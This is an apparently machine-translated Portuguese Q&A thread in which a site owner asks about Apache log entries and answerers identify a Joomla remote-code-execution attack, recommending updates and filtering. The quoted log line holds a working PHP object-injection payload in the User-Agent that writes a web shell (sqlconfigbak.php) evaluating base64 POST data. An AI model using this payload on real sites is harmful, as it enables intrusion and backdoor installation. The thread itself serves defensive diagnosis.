A identificação do agente do usuário foi usada para alguma técnica de ataque de script?

10

As entradas do log de acesso do Apache no meu site geralmente são como esta:

207.46.13.174 - - [31 / Out / 2016: 10: 18: 55 +0100] "GET / contact HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (compatível; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0,607 SENHORITA 10.10.36.125:104 0,607

para que você possa ver o campo user-agent ali. Mas hoje também encontrei o campo user-agent usado assim:

62.210.162.42 - - [31 / Out / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "}} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "higienizar"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT " ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; s: 19: " cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304

Isso foi um ataque? A próxima entrada de log parece ter recuperado com êxito o arquivo (código 200) sqlconfigbak.phpmencionado no script. Embora eu não consiga encontrar o arquivo no sistema de arquivos:

62.210.162.42 - - [31 / Out / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (compatível; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0,244

Por favor, o que estava acontecendo aqui?

miroxlav
fonte

Respostas:

11

Este é um ataque de 0 dias do Joomla. Informações encontradas aqui: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

Este não é um teste de vulnerabilidade, apesar do __test. É um ataque.

Certifique-se de que qualquer instalação do Joomla esteja o mais atualizada possível.

Outra opção é simplesmente usar .htaccess para interceptar essa exploração procurando por uma sequência comum, "__test" funcionaria e redirecionado para outro local.

closetnoc
fonte
4

O endereço IP que você vinculou não resolve para um nome de host do Google, portanto, não é o Google. A pessoa ou bot está examinando seu site quanto a vulnerabilidades. O primeiro está tentando encontrar uma vulnerabilidade do Joomla.

Esses eventos ocorrem regularmente na maioria dos sites. Você deve seguir as práticas recomendadas e fortalecer o site, o processo é longo e você precisará encontrar e seguir um tutorial on-line.

Simon Hayter
fonte
OK obrigada. Eu já endureci o site antes de encontrar isso. Honestamente, encontrar esse vetor de ataque me surpreendeu um pouco.
miroxlav
2

Além de outras respostas, observe que o fato de que esse ataque aparentemente funcionou sugere que você esteja executando uma versão antiga e insegura do PHP. Uma correção para o bug que esse ataque explora foi lançado em setembro de 2015. Execute o processo de atualização e verifique se ele extrai a versão mais recente do PHP. E verifique se há outros programas desatualizados que também estão voltados para a Internet, pois parece que seu servidor não está atualizado há pelo menos um ano.

Periata Breatta
fonte
Maldito bom ponto!
closetnoc